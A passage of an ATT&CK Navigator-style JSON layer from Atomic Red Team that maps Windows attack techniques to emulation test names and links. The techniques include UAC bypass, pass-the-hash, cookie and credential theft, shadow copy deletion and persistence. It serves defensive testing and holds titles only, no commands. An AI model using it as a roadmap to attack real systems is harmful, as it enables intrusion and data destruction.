Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic 
Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- 
ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive 
invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - 
Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software 
Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage 
Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet 
New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies 
(Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process 
cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- 
Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable 
UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in 
Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View 
